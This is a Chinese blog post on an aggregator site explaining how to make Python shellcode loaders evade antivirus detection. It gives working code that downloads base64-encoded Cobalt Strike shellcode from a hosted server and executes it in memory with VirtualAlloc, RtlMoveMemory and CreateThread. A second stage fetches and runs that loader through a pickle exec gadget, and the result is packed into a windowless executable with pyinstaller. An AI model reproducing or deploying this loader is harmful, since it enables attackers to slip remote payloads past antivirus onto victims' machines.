【python免杀】浅谈Python静态免杀

news/2025/3/4 18:45:18/文章来源:https://www.cnblogs.com/o-O-oO/p/18751127

本文我们再来看看利用python进行静态免杀吧!

先用CS生成 shellcode 把shellcode进行加密放在里面并存放到服务器。

python BS64 shellcode.txt

这里为了方便,我们直接放到了kali的apache目录下。

并启动Apache

service apache2 start

修改加载器的服务器地址后进行一次BS64加密,然后把代码放在loader.txt里面并存放到服务器

import ctypes,urllib.request,codecs,base64
shellcode = urllib.request.urlopen('http://192.168.5.38/shellcode.txt').read()
shellcode = shellcode.strip()
shellcode = base64.b64decode(shellcode)shellcode =codecs.escape_decode(shellcode)[0]shellcode = bytearray(shellcode)
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode))
)
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0))
)
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))

再次利用python编码

#-*- coding : utf-8-*-
#coding:unicode_escape
import pickle
import ctypes,urllib.request,codecs,base64
sectr = urllib.request.urlopen('http://192.168.5.38/loader.txt').read()
#sectr=str(sectr,'UTF-8')
#print(sectr)
sectr = base64.b64decode(sectr).decode("utf-8")
class A(object):def __reduce__(self):return (exec, (sectr,))
ret = pickle.dumps(A())
ret_base64 = base64.b64encode(ret)
ret_decode = base64.b64decode(ret_base64)
pickle.loads(ret_decode)

修改服务器地址后使用打包成exe可执行文件pyinstaller

pyinstaller -F -w py_ma.py

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/893545.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

3.4作业

3.4作业

阅读更多...
c#桌面winform通过wps调用power point文件播放,播放完立刻退出不留痕迹

c#桌面winform通过wps调用power point文件播放,播放完立刻退出不留痕迹

c#桌面winform通过wps调用power point文件播放,播放完立刻退出,不留痕迹.c#桌面winform通过wps调用power point文件播放,播放完立刻退出,不留痕迹. 以前一直用微软的office那个interop,愁死了,版本动不动就不对,加上国产化要求,干脆研究了一下换成wps office。原创,转…
阅读更多...
【红队武器库】一些C2的隐藏方法记录

【红队武器库】一些C2的隐藏方法记录

介绍 C2是指网络攻击者使用的一种基础架构,用于远程控制受感染的计算机或网络。攻击者可以通过C2系统发送命令和指令,控制受感染的计算机执行各种活动。本文将记录几种隐藏C2的方法。 使用CDN 1、在 (https://www.freenom.com) 注册一个免费域名,并将其绑定到您的 VPS 地址上…
阅读更多...
阿里云可观测 2025 年 2 月产品动态

阿里云可观测 2025 年 2 月产品动态

阿里云可观测 2025 年 2 月产品动态
阅读更多...
c# 托管堆和垃圾回收的clr的优化

c# 托管堆和垃圾回收的clr的优化

前言 上一章介绍了基本垃圾回收的思路,那么看一下怎么回收的性能提高 正文 优化性能的手段,一般是找到事物的特征,然后利用这种特征进行优化。对象越新,生存期越短。对象越老,生存期越长。回收堆的一部分,速度快于回收整个堆。托管堆在初始化时不包含对象。添加到堆的对象…
阅读更多...
HTTP 隧道工具上线C2

HTTP 隧道工具上线C2

前言 太多时候遇到目标不出网了,TCP、ICMP、DNS协议均不通,无法直接与公网的cobaltstrike或者metasploit服务端建立连接。 只能搭建HTTP隧道,那能通过HTTP隧道上线cobaltstrike或者metasploit吗❓ pystinger [1] 就可以做到,那除此之外呢❓ 接下来,我们探究一下其他HTTP隧…
阅读更多...
【权限维持技术】Windows文件隐藏(二)

【权限维持技术】Windows文件隐藏(二)

免责声明 本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号不为此承担任何责任。NTFS数据流 “交替数据流(Alternate Data Streams, ADS)”是Windows NTFS文件系统的高级特性。文件中可以包含多…
阅读更多...
UML之参与者(Actor)

UML之参与者(Actor)

参与者是需求分析阶段的重要元素,指与待开发系统交互的外部实体,包括人、外部系统、传感器、数据库等。识别参与者需注意区分真正的参与者和传递型参与者。参与者通常用小人图像表示,在UML用例图中与用例通过关联线连接。参与者(Actor)是模型中非常重要的元素,识别参与者…
阅读更多...
【权限维持技术】Windows文件隐藏(一)

【权限维持技术】Windows文件隐藏(一)

免责声明 本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号不为此承担任何责任。简介 文件隐藏是后门规避检查的一个重要手段,是权限维持中关键的一环。Windows操作系统可以使用多种方式进行文件…
阅读更多...
Deepseek等AI技术冲击下,Salesforce业务岗位如何保住自己的工作?

Deepseek等AI技术冲击下,Salesforce业务岗位如何保住自己的工作?

“世界变化太快了!”——这句话几乎成了每个职场人的口头禅。尤其是对于Salesforce顾问来说,技术的迭代速度更是让人应接不暇。你还记得10年前的Salesforce是什么样子吗?每天穿着正装、打着领带,坐在办公室里从早忙到晚,用着Salesforce Classic,手动部署变更集(Change S…
阅读更多...
20242816 2024-2025-2 《网络攻防实践》第1周作业

20242816 2024-2025-2 《网络攻防实践》第1周作业

1. 知识点梳理与总结 1.1 各组成部分功能 攻击机:攻击机是网络攻防实验中的核心组件之一,承担主动攻击的角色。通常,它运行渗透测试操作系统,内置丰富的网络攻击工具,攻击机用于模拟黑客攻击行为,执行信息收集、漏洞扫描、渗透测试、提权、权限维持等操作,以验证目标系统…
阅读更多...
拒绝被坑!大模型备案代办如何挑选

拒绝被坑!大模型备案代办如何挑选

大模型备案代办哪家好一直是困扰广大开发者的一个问题。今天我就教下有大模型备案需求的朋友如何甄别这些代办机构。另外,我也经常帮助客户撰写备案材料,如有需求,大家也可以进行咨询。一、专业能力 相比精美的PPT,滔滔不绝的讲解和各种诱人动听的服务承诺,查看服务案例数…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023